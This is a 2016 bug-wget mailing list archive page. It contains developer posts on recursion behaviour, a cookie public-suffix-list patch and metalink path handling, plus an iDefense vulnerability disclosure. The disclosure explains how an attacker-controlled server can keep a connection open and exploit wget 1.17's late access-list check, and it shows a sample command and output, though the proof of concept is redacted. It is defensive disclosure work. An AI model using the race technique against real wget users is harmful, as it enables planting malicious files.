[Bug-wget] Additional ideas for wget

2016-08-11 Thread Dale R. Worley
(1) The description of the options that limit recursion needs to be
written better so that it is clear how various combinations of options
interact.

(2) I'd like to be able to make wget annotate each page with the URL
from which it was obtained, so if I later look at the file, I know its
origin.  With HTML files, it seems like it would be workable to append
to each file "\n\n".

Comments?

Dale



[Bug-wget] Recursion problem with wget

2016-08-11 Thread Dale R. Worley
In regard to my problem, http://savannah.gnu.org/bugs/?48708

The behavior stems from (what seems to me to be) an oddity in how wget
handles recursion:  If a page is fetched from a URL, but that fetch
involves no HTTP redirection, then the embedded links are tested against
the recursion criteria to see if they should be fetched.  But if the
page fetch involves redirection, the page is fetched, but if the
ultimate URL of the redirection does not itself pass the recursion
criteria, the links in the page are not considered, even if they pass
the recursion criteria.

My preferred behavior is that all pages that are retrieved are scanned
for embedded links in any case.

The behavior can be "corrected" straightforwardly:

diff --git a/src/recur.c b/src/recur.c
index 2b17e72..91cc585 100644
--- a/src/recur.c
+++ b/src/recur.c
@@ -360,6 +361,7 @@ retrieve_tree (struct url *start_url_parsed, struct iri 
*pi)
 {
   reject_reason r = descend_redirect (redirected, 
url_parsed,
 depth, start_url_parsed, 
blacklist, i);
+  r = WG_RR_SUCCESS;
   if (r == WG_RR_SUCCESS)
 {
   /* Make sure that the old pre-redirect form gets

This, of course, isn't the proper and final fix.

It seems to me that making this change in the code would change its
behavior sufficiently that we would have to worry about backward
compatibility.  Ideally, I'd like the new default behavior to be my
preferred behavior, and use an option to restore the previous behavior.
But it might be necessary to use an option to enable my preferred
behavior to prevent disruption.

Interestingly, "make check" *succeeds* with the above code change, so
the test suite is *not* testing for this behavior.

Comments?

Dale



[Bug-wget] CVE Request - Gnu Wget 1.17 - Design Error Vulnerability

2016-08-11 Thread Misra, Deapesh
Hi,

--
- Background -
--

Here at iDefense, Verisign Inc, we have a Vulnerability Contributor Program 
(VCP) where we buy vulnerabilities. 

Recently, security researcher Dawid Golunski sold us an interesting 
vulnerability within Wget. We asked Red Hat (secalert at redhat dot com) if 
they would help us with the co-ordination (patching, disclosure, etc) of this 
vulnerability. Once they graciously accepted, we discussed the vulnerability 
with them. After their initial triage, Red Hat recommended that we publicly 
post the details of this vulnerability to this mailing list for further 
discussion and hence this email.

--
- Title -
--

Wget Race Condition Recursive Download Accesslist Race Condition Vulnerability


-  Vulnerable Version  -


GNU Wget <= 1.17   Race Condition / Access-list Bypass

---
-  Vulnerability  -
---

When wget is used in recursive/mirroring mode, according to the manual it can 
take the following access list options:

"Recursive Accept/Reject Options:
  -A acclist --accept acclist
  -R rejlist --reject rejlist

Specify comma-separated lists of file name suffixes or patterns to accept or 
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in an 
element of acclist or rejlist, it will be treated as a pattern, rather than a 
suffix."

These can for example be used to only download JPG images. 

The vulnerability surfaces when wget is used to download a single file with 
recursive option (-r / -m) and an access list ( -A ), wget only applies the 
list at the end of the download process. 

This can be observed on the output below:

# wget -r -nH -A '*.jpg' http://attackers-server/test.php
Resolving attackers-server... 192.168.57.1
Connecting to attackers-server|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: 'test.php'

15:05:46 (27.3 B/s) - 'test.php' saved [52]

Removing test.php since it should be rejected.

FINISHED


Although the file get successfully deleted in the end, this creates a race 
condition situation as an attacker who has control over the URL, could slow 
down the download process so that he had a chance to make use of the malicious 
file before it gets deleted.


It is very easy for an attacker to win this race as the file only gets deleted 
after the HTTP connection is terminated. He can therefore keep the connection 
open as long as necessary to make use of the uploaded file.  Below is proof of 
concept exploit that demonstrates this technique.  


--
-  Proof of Concept  -
--

< REDACTED BY iDefense FOR THE TIME BEING >

---
-  Discussion  -
---

>From the wget manual:

https://access.redhat.com/security/team/contact

> Finally, it's worth noting that the accept/reject lists are matched twice 
> against downloaded files: once against the URL's filename portion, to 
> determine if the file should be downloaded in the first place; then, after it 
> has been accepted and successfully downloaded, the local file's name is also 
> checked against the accept/reject lists to see if it should be removed. The 
> rationale was that, since '.htm' and '.html' files are always downloaded 
> regardless of accept/reject rules, they should be removed after being 
> downloaded and scanned for links, if they did match the accept/reject lists. 
> However, this can lead to unexpected results, since the local filenames can 
> differ from the original URL filenames in the following ways, all of which 
> can change whether an accept/reject rule matches: 


and from the source code, in file recur.c:

  if (file
  && (opt.delete_after
  || opt.spider /* opt.recursive is implicitely true */
  || !acceptable (file)))
{
  /* Either --delete-after was specified, or we loaded this
 (otherwise unneeded because of --spider or rejected by -R)
 HTML file just to harvest its hyperlinks -- in either case,
 delete the local file. */
  DEBUGP (("Removing file due to %s in recursive_retrieve():\n",
   opt.delete_after ? "--delete-after" :
   (opt.spider ? "--spider" :
"recursive rejection criteria")));
  logprintf (LOG_VERBOSE,
 (opt.delete_after || opt.spider
  ? _("Removing %s.\n")
  : _("Removing %s since it should be rejected.\n")),
 file);
  if (unlink (file))
logprintf (LOG_NOTQUIET, "unlink: %s\n", strerror (errno));
  logputs (LOG_VERBOSE, "\n");
  register_delete_file (file);
}


it is evident that the accept/reject rule is applied only after the 

[Bug-wget] [PATCH] Improve PSL cookie checking

2016-08-11 Thread Tim Rühsen
Whenever a HTTP server sends cookies, we have to check for validity before we
accept them. The Mozilla Publix Suffix List (PSL[0]) provides a set of rules
that allows to detect some forms of domain misuses (which would allow privacy
leaking of cookies, e.g. login information leaks).

Here is a patch that allows Wget to automatically load the latest PSL, if
provided by a distribution/package.
Using PSL in DAFSA[1] format is recommended - as Debian provides in it's
latest 'publicsuffix' package. Plain text PSL still works, but needs a bunch of
parsing and processing while the DAFSA format doesn't (just a read - and it is
ready to use).
Libpsl[2] 0.14.+ provides a tool to compile plain text PSL into DAFSA format.

I chose a configure option to allow package maintainers to set a default PSL
file at build time. If it can't be read, the code falls back to the built-in
data of libpsl.

Please review and comment.

Regards, Tim

[0] https://publicsuffix.org/
[1] https://en.wikipedia.org/wiki/Deterministic_acyclic_finite_state_automaton
[2] https://github.com/rockdaboot/libpsl
From 11e69c7c8c56efd075d492d0b0e977b16a83c64e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Tim Rühsen?= 
Date: Thu, 11 Aug 2016 15:16:24 +0200
Subject: [PATCH] Improve PSL cookie checking

* configure.ac: Add --with-psl-file to set a PSL file
* src/cookies.c (check_domain_match): Load PSL_FILE with
  fallback to built-in data.

This change allows package maintainers to make Wget use the latest
PSL (DAFSA or plain text), without updating libpsl itself.

E.g. Debian now comes with a DAFSA binary within the 'publicsuffix'
package which allows very fast loading (no parsing or processing needed).
---
 configure.ac  |  7 ++-
 src/cookies.c | 43 ++-
 2 files changed, 44 insertions(+), 6 deletions(-)

diff --git a/configure.ac b/configure.ac
index cce20c6..20cdbd2 100644
--- a/configure.ac
+++ b/configure.ac
@@ -329,6 +329,11 @@ AS_IF([test "x$with_libpsl" != xno], [
   ])
 ])

+# Check for custom PSL file
+AC_ARG_WITH(psl-file,
+  AC_HELP_STRING([--with-psl-file=[PATH]], [path to PSL file (plain text or DAFSA)]),
+  PSL_FILE=$withval AC_DEFINE_UNQUOTED([PSL_FILE], ["$PSL_FILE"], [path to PSL file (plain text or DAFSA)]))
+
 AS_IF([test x"$with_zlib" != xno], [
   with_zlib=yes
   PKG_CHECK_MODULES([ZLIB], zlib, [
@@ -823,7 +828,7 @@ AC_MSG_NOTICE([Summary of build options:
   Libs:  $LIBS
   SSL:   $with_ssl
   Zlib:  $with_zlib
-  PSL:   $with_libpsl
+  PSL:   $with_libpsl $PSL_FILE
   Digest:$ENABLE_DIGEST
   NTLM:  $ENABLE_NTLM
   OPIE:  $ENABLE_OPIE
diff --git a/src/cookies.c b/src/cookies.c
index 767b284..d45f4ef 100644
--- a/src/cookies.c
+++ b/src/cookies.c
@@ -526,19 +526,52 @@ check_domain_match (const char *cookie_domain, const char *host)
 {

 #ifdef HAVE_LIBPSL
+  static int init_psl;
+  static const psl_ctx_t *psl;
+
   char *cookie_domain_lower = NULL;
   char *host_lower = NULL;
-  const psl_ctx_t *psl;
   int is_acceptable;

   DEBUGP (("cdm: 1"));
-  if (!(psl = psl_builtin()))
+  if (!init_psl)
 {
-  DEBUGP (("\nlibpsl not built with a public suffix list. "
-   "Falling back to simple heuristics.\n"));
-  goto no_psl;
+  init_psl = 1;
+
+#ifdef PSL_FILE
+  /* If PSL_FILE is a DAFSA file, loading is very fast */
+  if ((psl = psl_load_file (PSL_FILE)))
+goto have_psl;
+
+  DEBUGP (("\nPSL: %s not found or not readable. "
+   "Falling back to built-in data.\n", quote (PSL_FILE)));
+#endif
+
+  if ((psl = psl_builtin ()) && !psl_builtin_outdated ())
+goto have_psl;
+
+  DEBUGP (("\nPSL: built-in data outdated. "
+   "Trying to load data from %s.\n",
+  quote (psl_builtin_filename (;
+
+  if ((psl = psl_load_file(psl_builtin_filename (
+goto have_psl;
+
+  DEBUGP (("\nPSL: %s not found or not readable. "
+   "Falling back to built-in data.\n",
+  quote (psl_builtin_filename (;
+
+  if (!(psl = psl_builtin ()))
+{
+  DEBUGP (("\nPSL: libpsl not built with a public suffix list. "
+   "Falling back to simple heuristics.\n"));
+  goto no_psl;
+}
 }
+  else if (!psl)
+goto no_psl;

+have_psl:
   if (psl_str_to_utf8lower (cookie_domain, NULL, NULL, _domain_lower) == PSL_SUCCESS &&
   psl_str_to_utf8lower (host, NULL, NULL, _lower) == PSL_SUCCESS)
 {
--
2.8.1



signature.asc
Description: This is a digitally signed message part.


Re: [Bug-wget] [PATCH] Support metalink:file elements with a "path/file" format

2016-08-11 Thread Matthew White
On Wed, 10 Aug 2016 11:30:12 +0200
Tim Rühsen  wrote:

> On Mittwoch, 10. August 2016 06:23:49 CEST Matthew White wrote:
> > On Tue, 09 Aug 2016 21:25:16 +0200
> > 
> > Tim Rühsen  wrote:
> > > On Freitag, 5. August 2016 20:25:06 CEST Matthew White wrote:
> > > > On Thu, 04 Aug 2016 16:47:18 +0200
> > > > 
> > > > Tim Ruehsen  wrote:
> > > > > On Wednesday, August 3, 2016 1:46:56 PM CEST Matthew White wrote:
> > > > > > On Tue, 02 Aug 2016 11:27:08 +0200
> > > > > > 
> > > > > > Tim Ruehsen  wrote:
> > > > > > > On Tuesday, August 2, 2016 10:06:42 AM CEST Matthew White wrote:
> > > > > > > > On Sat, 30 Jul 2016 21:23:56 +0200
> > > > > > > > 
> > > > > > > > Matthew White  wrote:
> > > > > > > > > Hello!
> > > > > > > > > 
> > > > > > > > > I noticed that wget doesn't use the metalink:file element as
> > > > > > > > > the
> > > > > > > > > RFC5854
> > > > > > > > > suggests.
> > > > > > > > > 
> > > > > > > > > https://tools.ietf.org/html/rfc5854#section-4.1.2.1
> > > > > > > > > 
> > > > > > > > > The RFC5854 specifies that the metalink:file could have a
> > > > > > > > > "path/file"
> > > > > > > > > format. In this case wget should create the "path" tree and
> > > > > > > > > save
> > > > > > > > > the
> > > > > > > > > file
> > > > > > > > > as "path/file", but it doesn't. Instead wget saves the file in
> > > > > > > > > the
> > > > > > > > > working directory.
> > > > > > > > > 
> > > > > > > > > e.g. 
> > > > > > > > > 
> > > > > > > > > With this patch wget conforms to the RFC5854.
> > > > > > > > > 
> > > > > > > > > I made this patch working on the following branch:
> > > > > > > > > master (latest 20cac2c5ab3d63aacfba35fb10878a2d490e2377)
> > > > > > > > > git://git.savannah.gnu.org/wget.git
> > > > > > > > > 
> > > > > > > > > Let me know if this helps.
> > > > > > > > 
> > > > > > > > Hi,
> > > > > > > > 
> > > > > > > > After the suggestions of Tim, I fixed the patch (nice! fix the
> > > > > > > > fix...).
> > > > > > > > So,
> > > > > > > > scratch the previous patch and use this one instead.
> > > > > > > > 
> > > > > > > > The function concat_strings() replaces the combination of
> > > > > > > > malloc(),
> > > > > > > > strlen(), and strcpy(). (Thanks Tim.)
> > > > > > > 
> > > > > > > In this special case (just one string to clone), please use
> > > > > > > xstrdup().
> > > > > > > That is much less overhead.
> > > > > > > 
> > > > > > > > The description now follows the style of the other patches.
> > > > > > > > (Thanks
> > > > > > > > again
> > > > > > > > Tim!)
> > > > > > > > 
> > > > > > > > You may consider this patch a Bugfix:
> > > > > > > > * src/utils.c (unique_create, fopen_excl): cannot create a
> > > > > > > > directory
> > > > > > > > tree
> > > > > > > > like "path/file".
> > > > > > > > 
> > > > > > > > The problem is that fopen_excl() doesn't create non-existing
> > > > > > > > directories.
> > > > > > > > What do you suggest?
> > > > > > > 
> > > > > > > IMO, saving metalink files should work 'as usual and expected'.
> > > > > > > That
> > > > > > > means, all the directory options should apply (see man wget /
> > > > > > > Directory
> > > > > > > Options). We also have to deal with 'escaping' file name sequences
> > > > > > > like
> > > > > > > ../ etc.
> > > > > > > Not to forget character set conversions.
> > > > > > > 
> > > > > > > What about cases where you download https://myserver/file.tgz, and
> > > > > > > in
> > > > > > > the
> > > > > > > metalink file 'name' is set to 'xyz.doc' ? IMO, we should keep
> > > > > > > file.tgz,
> > > > > > > except the user stated --trust-server-names.
> > > > > > > 
> > > > > > > Maybe we should set up a a metalink document where we define how
> > > > > > > everything
> > > > > > > should work including corner cases. Next step would be to set up
> > > > > > > appropriate tests and fix the wget metalink code to survive the
> > > > > > > tests.
> > > > > > > 
> > > > > > > > Can we make this patch obsolete?
> > > > > > > 
> > > > > > > Basically yes.
> > > > > > > But we see, there is still much to do around metalink ... but most
> > > > > > > of
> > > > > > > the
> > > > > > > needed code is already there. Most work will be the definition and
> > > > > > > the
> > > > > > > tests.
> > > > > > > 
> > > > > > > Regards, Tim
> > > > > > 
> > > > > > Changed to use xstrdup(), new patch attached.
> > > > > 
> > > > > I already mentioned, that taking the metalink filename pulls in a
> > > > > security
> > > > > issue. It might escape the current directory with a relative or
> > > > > absolute
> > > > > path.
> > > > 
> > > > Actually, wget aborts if something like "../path/file" is found as
> > > > metalink:file name (see attached document as patch). The same goes for
> > > > "./path/file" and "/path/file".
> > > > 
> > > > > You might just take the file name without path, but only if the the
> > > > > option
> > > > > --